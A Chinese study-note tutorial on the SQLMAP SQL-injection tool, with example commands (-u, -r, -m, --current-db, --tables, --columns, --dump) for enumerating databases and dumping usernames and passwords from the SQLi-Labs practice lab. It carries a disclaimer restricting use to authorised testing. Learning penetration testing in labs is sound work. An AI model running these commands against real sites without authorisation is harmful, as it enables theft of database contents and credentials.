SQLMAP是一个开源的自动化SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。
主要包括一些关系型数据库(RMDBS),如MySQL、Oracle、PostgreSQL、Microsoft SOL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、Informix、HSQLDB等。
误报检测:SQLMAP的布尔盲注、时间盲注方式判断注入点时,存在误报的可能为防止误报,SQLMap引入了误报检测机制。
两个基础检测算法:
命令实例:
sqlmap -u "www.test.com/index.php?id=1"
验证过程:
sqlmap -u http://xxx.xxx.xxx.xxx/page.php?id=10 --current-db //爆当前库
sqlmap -u http://xxx.xxx.xxx.xxx/page.php?id=10 -D 数据库名 --tables //爆表名
sqlmap -u http://xxx.xxx.xxx.xxx/page.php?id=10 -D 数据库名 -T 表名 --columns //爆字段
sqlmap -u http://xxx.xxx.xxx.xxx/page.php?id=10 -D 数据库名 -T 表名 -C 字段名1,字段名2,字段名3...(互相用逗号隔开) --dump //显示数据
目标靶机 : SQLi-Labs的less-1
要求 : 利用SQLMAP实现注入,获取users表中存储的用户名、密码
命令实例:
sqlmap -r /usr/a.txt
说明 : 使用该命令时须指明a.txt(保存着http请求包)文件所在的绝对路径
验证过程 : 与-u参数类似
目标靶机 : SQLi-Labs的less-11
命令实例:
sqlmap -m /usr/b.txt
说明 : 使用该命令时须指明b.txt(保存着多项URL)文件所在的绝对路径。
验证过程 : 与-u参数类似
本文部分图片摘自深信服安全服务认证工程师课程课件中,为方便个人学习使用,勿作商用!!!!文字内容为自己手打,并非直接搬运!如有侵权,请联系删除!!!
本文档所提供的信息仅用于教育目的及在获得明确授权的情况下进行渗透测试。任何未经授权使用本文档中技术信息的行为都是严格禁止的,并可能违反《中华人民共和国网络安全法》及相关法律法规。使用者应当合法合规地运用所学知识,不得用于非法入侵、破坏信息系统等恶意活动。我们强烈建议所有读者遵守当地法律与道德规范,在合法范围内探索信息技术。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。